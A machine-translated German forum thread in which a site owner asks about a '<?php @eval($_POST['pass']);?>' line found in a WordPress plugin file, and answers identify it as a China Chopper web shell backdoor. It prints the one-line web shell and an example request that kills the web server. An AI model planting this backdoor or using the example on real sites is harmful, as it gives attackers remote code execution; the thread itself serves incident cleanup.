Gefunden <?php @eval($_POST['pass']);?> code in wordpress-Seite
Fand ich diesen code in einer meiner wordpress-plugin-site.
Ich denke, es kann verwendet werden, mit böswilliger Absicht, aber was genau tut es und kann ich herausfinden, ob es fordert einige andere Aktionen, die ich beachten sollte?
- Ich bräuchte ein paar umliegenden code. Was macht das plugin tun? Der Vorsatz war meine erste Vermutung auch.
- Es ist eine Vertrauenswürdige plugin WP Migrate DB, aber die Website wurde gehackt und ich bin versucht zu reinigen, bis alle Rückstände
- Ich bin nicht sicher, können Sie sagen, ob es ein hack ohne Blick auf all die anderen code, die, wenn Ihre Website gehackt wurde, könnte sich jede wordpress-Datei überhaupt. Würde ich WP neu installieren und alle plugins aus vertrauenswürdigen Quellen. Alternativ können Sie immer versuchen das auskommentieren der Zeile und sehen, wenn etwas bricht 🙂
- Ich vergaß zu erwähnen, ist das der einzige code in der Datei. Die Datei heißt functions.php also ich denke, dass Sie tiefer in das plugin-Verzeichnis ist es sicher zu löschen.
- Das scheint zu bedeuten, dass es eine andere Datei irgendwo aufruft functions.php und nutzt es zu schnappen Sie sich Ihr Kennwort, ohne dass es offensichtlich ist, dass es den Umgang mit Ihrem Passwort. Ich würde diese Datei eine 99% ige chance, Teil von einem hack. Ich würde löschen alle deine plugins und installieren Sie Sie zumindest
- Ich habe die Datei gelöscht und die website ist in Ordnung. Möchte nur wissen ob es mehr zu... danke für die Hilfe trotzdem.
- Es sieht sehr schlecht aus. Wahrscheinlich war es nicht die einzige Hintertür.
- Ich lief WordFence auf der WordPress-Website, die ich war Befestigungs - und ich dachte, ich hatte fest - es fanden zwei weitere große Heldentaten.
Du musst angemeldet sein, um einen Kommentar abzugeben.
Dieses PHP-script gehört zu China Chopper Hacking Kit.
https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
Ja, es ist sehr schlecht. Ich kann mir nicht vorstellen, jede situation, wo dieser code vorhanden sein könnte als Teil einer harmlosen software.
Dieser code im wesentlichen ermöglicht das ausführen beliebigen php-code durch die
pass
get-parameter. Zum Beispiel der Aufruf dieser php alshttp://yoursite/your.php?pass=system("killall -9 apache");
wird erschossen auf Ihrem webserver. Aber es ist verwendbar für alles (einschließlich überschreiben /erweitern Sie Ihre vorhandenen Skripte speichern, um das Website-Passwörter in eine temporäre Datei. Und später, um diese temporäre Datei zurück).Ist es wahrscheinlich eine backdoor, und wahrscheinlich nicht der einzige. Ihre Website braucht ein tiefes security-check.
$codeToRunInBackdoor
hatte vielleicht ein bisschen schrill.